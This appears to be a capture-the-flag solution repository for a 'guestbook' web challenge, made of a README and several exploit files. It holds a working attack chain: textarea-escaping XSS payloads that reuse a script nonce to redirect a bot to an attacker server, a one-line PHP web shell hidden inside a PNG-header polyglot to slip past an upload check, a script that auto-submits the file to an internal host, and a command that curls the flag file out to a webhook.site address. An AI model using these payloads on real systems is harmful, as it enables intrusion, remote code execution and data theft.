BingoCTF - guestbook

README.md

guestbook

1. Generate payload with gen_payload.php
2. Put exploit1.html, exploit2.html, and generated payload.bin on your Web server
3. Post </textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit1.html`</script><textarea>
4. Fix filename in exploit2.html from payload_0.6719151792598002.php to payload_(value shown in logs).php
5. Post </textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit2.html`</script><textarea>

base.php

<?php shell_exec($_GET['cmd']);

exploit1.html

<form method="POST" enctype="multipart/form-data" action="http://private/upload.php" id="form">
  <input type="text" name="submit" value="ok">
  <input type="file" name="fileToUpload" id="up">
  <input type="submit" id="go">
</form>
<script>
(async () => {
const form = document.getElementById('form');
const up = document.getElementById('up');

const content = await fetch('/payload.bin').then(resp => resp.blob());

const blob = new Blob([content], { type: "image/png"}); 
const filename = 'payload_' + Math.random() + '.php';
await fetch('/log.php?filename=' + filename);
const file = new File([blob], filename);

const dt = new DataTransfer();
dt.items.add(file);
const list = dt.files;

up.files = list;

const go = document.getElementById('go');
go.click();
})();
</script>

exploit2.html

<script>
location.href = "http://private/uploads/payload_0.6719151792598002.php?cmd=" + encodeURIComponent('curl "https://webhook.site/e9ad957a-4480-44ff-b428-3324b77c15f0" -F a=@/flag');
</script>  

gen_payload.php

<?php
$a = file_get_contents('base.png');
$b = file_get_contents('base.php');
file_put_contents('payload.bin', substr($a, 0, 100) . $b);